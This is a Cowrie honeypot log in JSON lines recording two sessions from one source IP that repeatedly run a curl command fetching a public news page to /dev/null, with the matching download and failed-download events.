{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.900801Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.935520Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.947242Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.969675Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.974106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.975318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.983596Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.984777Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.989569Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.998410Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.031604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.032793Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.036954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.037997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.043250Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.067696Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.069778Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.071257Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.075316Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.076269Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.110496Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.111747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.114914Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.116188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.135273Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.148398Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.157753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.159008Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.178717Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.180078Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.196169Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.200675Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.213449Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.215234Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.226238Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.251137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.252491Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.255952Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.264532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.275051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.276264Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.297757Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.298969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.311494Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.312485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.355743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.357015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.361528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.362505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.371614Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.390868Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.394008Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.395099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.397408Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.398983Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.399862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.400721Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.415129Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.431352Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.432595Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.437631Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.438590Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.440928Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.456841Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.473773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.474994Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.477263Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.478126Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.502012Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.503369Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.519771Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.520926Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.523973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.524850Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.580235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.581537Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.583637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.584767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.591000Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.620173Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.621372Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.625126Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.626425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.627396Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.634530Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.636130Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.670612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.673886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.674977Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.681764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.682776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.712180Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.721768Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.722955Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.731062Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.732217Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.734891Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.762881Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.770505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.771609Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.777358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:50.778356Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:50.807954Z","src_ip":"212.227.125.160","session":"7541ed730449"}
